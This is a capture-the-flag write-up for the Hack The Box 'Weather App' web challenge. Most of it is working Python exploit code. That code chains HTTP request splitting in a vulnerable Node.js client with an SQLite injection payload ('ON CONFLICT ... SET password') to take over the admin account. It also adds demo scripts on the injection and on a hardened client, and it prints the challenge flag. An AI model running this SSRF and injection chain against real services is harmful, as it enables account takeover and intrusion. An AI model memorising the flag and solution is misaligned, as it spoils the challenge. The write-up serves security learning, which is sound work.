Weather App

kali@kali:~/0.htb/challenges/Web/Weather_App/web_weather_app$ sudo ./build-docker.sh
The challenge is then reachable at http://127.0.0.1:1337.

Now, let's dig into the code. This is a Node.js app using express, so we can see all 4 available routes at routes/index.js.
/, /register, /login, /api/weather

Let's take a look at the database functions inside database.js:
The username column is UNIQUE, and a user with username 'admin' already exists.

isAdmin() is not vulnerable to injection: it passes the parameters through '?' placeholders, so the driver escapes any quotes and the input can never change the query. register() builds its query without placeholders, so that is the only place where a malicious payload can be injected into the database: by registering a new user. Registration is only accepted from the application host itself, which is why the injection has to be delivered through the SSRF below.
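To see why the placeholder matters, here is an added example (my own, not the challenge's code) that replays the payload used by the exploit below against a constructed in-memory SQLite table with the same shape: a UNIQUE username column and a pre-seeded admin row. The column names and admin's original password are assumptions. The string-built insert lets the payload turn into an UPSERT that rewrites admin's password; the parameterized insert just trips the UNIQUE constraint and leaves admin alone.

```python
import sqlite3

# Payload from the writeup: closes the VALUES list and appends an SQLite UPSERT
# clause that fires because 'admin' already exists (username is UNIQUE).
PAYLOAD_USERNAME = "admin"
PAYLOAD_PASSWORD = "1337') ON CONFLICT(username) DO UPDATE SET password = 'admin';--"


def fresh_db():
    """Constructed stand-in for the challenge DB. Column names and the seeded
    admin password are assumptions for this demo, not values from the challenge."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT UNIQUE, password TEXT)")
    db.execute("INSERT INTO users (username, password) VALUES ('admin', 'some-unguessable-secret')")
    return db


def register_vulnerable(db, username, password):
    # String-built query in the spirit of register(): the quote in the password
    # ends the string literal and the rest of the payload becomes SQL.
    db.execute(f"INSERT INTO users (username, password) VALUES ('{username}', '{password}')")


def register_parameterized(db, username, password):
    # Placeholders hand the values to SQLite separately from the SQL text, so the
    # payload is treated as an opaque string and the duplicate username is rejected.
    db.execute("INSERT INTO users (username, password) VALUES (?, ?)", (username, password))


def admin_password(db):
    return db.execute("SELECT password FROM users WHERE username = 'admin'").fetchone()[0]


def run(register):
    """Register with the payload through `register` and report what happened to admin."""
    db = fresh_db()
    before = admin_password(db)
    try:
        register(db, PAYLOAD_USERNAME, PAYLOAD_PASSWORD)
        error = None
    except sqlite3.IntegrityError as exc:
        error = str(exc)
    return {"admin_password_before": before, "admin_password_after": admin_password(db), "error": error}


if __name__ == "__main__":
    print("vulnerable:   ", run(register_vulnerable))
    print("parameterized:", run(register_parameterized))
```

Only the parameterized variant raises; the vulnerable one reports success, and admin's password is now 'admin'.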

Server-Side Request Forgery
https://www.rfk.id.au/blog/entry/security-bugs-ssrf-via-request-splitting/
https://github.com/hacefresko/HTB-Web-WriteUps/blob/main/Weather%20App/Weather%20App.md

ssrf.py
import requests

url = 'http://138.68.182.108:31439'   # challenge instance

username = "admin"
# SQLite UPSERT: the INSERT collides with the existing admin row (username is UNIQUE)
# and the ON CONFLICT clause overwrites that row's password with 'admin'.
password = "1337') ON CONFLICT(username) DO UPDATE SET password = 'admin';--"

# \u0120 is written as 0x20 (space) by the vulnerable Node HTTP client; quotes are
# URL-encoded so they reach the form parser intact.
parsedUsername = username.replace(" ", "\u0120").replace("'", "%27").replace('"', "%22")
parsedPassword = password.replace(" ", "\u0120").replace("'", "%27").replace('"', "%22")
contentLength = len(parsedUsername) + len(parsedPassword) + 19   # len('username=') + len('&password=')

# \u010D\u010A is written as \r\n. The first request line is closed early, a POST /register
# is smuggled in behind it, and the trailing GET soaks up whatever the app appends to the path.
endpoint = ('127.0.0.1/\u0120HTTP/1.1\u010D\u010AHost:\u0120127.0.0.1\u010D\u010A\u010D\u010A' +
            'POST\u0120/register\u0120HTTP/1.1\u010D\u010AHost:\u0120127.0.0.1\u010D\u010A' +
            'Content-Type:\u0120application/x-www-form-urlencoded\u010D\u010A' +
            'Content-Length:\u0120' + str(contentLength) + '\u010D\u010A\u010D\u010A' +
            'username=' + parsedUsername + '&password=' + parsedPassword + '\u010D\u010A\u010D\u010A' +
            'GET\u0120/?lot=')

r = requests.post(url + '/api/weather', json={'endpoint': endpoint, 'city': 'lol', 'country': 'lol'})
print(r.status_code, r.text)

kali@kali:~/0.htb/challenges/Web/Weather_App$ python3 ssrf.py
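To check the smuggled request before firing it, here is an added example (my own, not part of the original writeup) that models the byte truncation described in the linked post and then parses the result the way the target server would. The request the app wraps around `endpoint` (host split off at the first '/', a `/data/2.5/weather?...` suffix, a Host header appended by the client) is a simplified assumption; the payload constants are the ones from ssrf.py. It also shows the check a patched client performs before touching the socket, modelled on current Node.js refusing unescaped characters in the request path.

```python
from urllib.parse import unquote

# Code points whose low byte is space, CR and LF; ssrf.py uses them verbatim.
SP, CR, LF = "\u0120", "\u010D", "\u010A"

# Payload from ssrf.py, repeated here so the block runs on its own.
SQLI_USERNAME = "admin"
SQLI_PASSWORD = "1337') ON CONFLICT(username) DO UPDATE SET password = 'admin';--"


def latin1_collapse(s: str) -> bytes:
    """Model of the bug in the linked post: the affected Node.js http client wrote
    the request line as latin1, keeping only the low byte of every code point,
    so U+0120 -> 0x20, U+010D -> 0x0D and U+010A -> 0x0A."""
    return bytes(ord(c) & 0xFF for c in s)


def encode_field(value: str) -> str:
    """The substitutions ssrf.py applies to each form field."""
    return value.replace(" ", SP).replace("'", "%27").replace('"', "%22")


def build_endpoint(username: str, password: str) -> str:
    """Assemble the `endpoint` value. Content-Length is taken from the bytes that
    will actually hit the wire instead of the hand-counted 19 in ssrf.py."""
    body = f"username={encode_field(username)}&password={encode_field(password)}"
    length = len(latin1_collapse(body))
    return (
        f"127.0.0.1/{SP}HTTP/1.1{CR}{LF}Host:{SP}127.0.0.1{CR}{LF}{CR}{LF}"
        f"POST{SP}/register{SP}HTTP/1.1{CR}{LF}Host:{SP}127.0.0.1{CR}{LF}"
        f"Content-Type:{SP}application/x-www-form-urlencoded{CR}{LF}"
        f"Content-Length:{SP}{length}{CR}{LF}{CR}{LF}{body}{CR}{LF}{CR}{LF}"
        f"GET{SP}/?lot="
    )


def client_request(endpoint: str, city: str = "lol", country: str = "lol") -> bytes:
    """Bytes a vulnerable client would send for http://<endpoint>/data/2.5/weather?...
    Simplified model (assumption): text up to the first '/' is the host, the rest is
    the path, the query suffix is a guess, and the client appends its own Host header."""
    host, _, rest = endpoint.partition("/")
    path = f"/{rest}/data/2.5/weather?q={city},{country}&appid=KEY"
    return latin1_collapse(f"GET {path} HTTP/1.1\r\nHost: {host}\r\n\r\n")


def hardened_client_request(endpoint: str) -> bytes:
    """What a patched client does instead: refuse any request-target character
    outside visible ASCII before anything reaches the socket (simplified check)."""
    _, _, rest = endpoint.partition("/")
    if any(not (0x21 <= ord(c) <= 0x7E) for c in rest):
        raise ValueError("Request path contains unescaped characters")
    return client_request(endpoint)


def split_requests(wire: bytes) -> list:
    """Parse the stream the way an HTTP/1.1 server does: skip blank lines between
    messages, read the head, then exactly Content-Length body bytes."""
    reqs, pos = [], 0
    while pos < len(wire):
        while wire[pos:pos + 2] == b"\r\n":      # tolerated empty lines (RFC 7230 3.5)
            pos += 2
        if pos >= len(wire):
            break
        head_end = wire.index(b"\r\n\r\n", pos)
        lines = wire[pos:head_end].decode("latin-1").split("\r\n")
        method, target, version = lines[0].split(" ")
        headers = {}
        for line in lines[1:]:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
        body_start = head_end + 4
        body_len = int(headers.get("content-length", "0"))
        body = wire[body_start:body_start + body_len].decode("latin-1")
        reqs.append({"method": method, "target": target, "headers": headers, "body": body})
        pos = body_start + body_len
    return reqs


def decode_form(body: str) -> dict:
    """Minimal application/x-www-form-urlencoded decoder (no '+' handling needed here)."""
    return {k: unquote(v) for k, v in (kv.split("=", 1) for kv in body.split("&"))}


if __name__ == "__main__":
    wire = client_request(build_endpoint(SQLI_USERNAME, SQLI_PASSWORD))
    for r in split_requests(wire):
        print(r["method"], r["target"], decode_form(r["body"]) if r["body"] else "")
    try:
        hardened_client_request(build_endpoint(SQLI_USERNAME, SQLI_PASSWORD))
    except ValueError as exc:
        print("hardened client:", exc)
```

If Content-Length were off by even one byte, the parser would misalign and the third request would never come out cleanly; the fact that it does is the sanity check worth running before pointing the exploit at the live instance.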

Now log in at http://138.68.182.108:31439/login with username admin and password admin to get the flag:

HTB{w3lc0m3_t0_th3_p1p3_dr34m} 
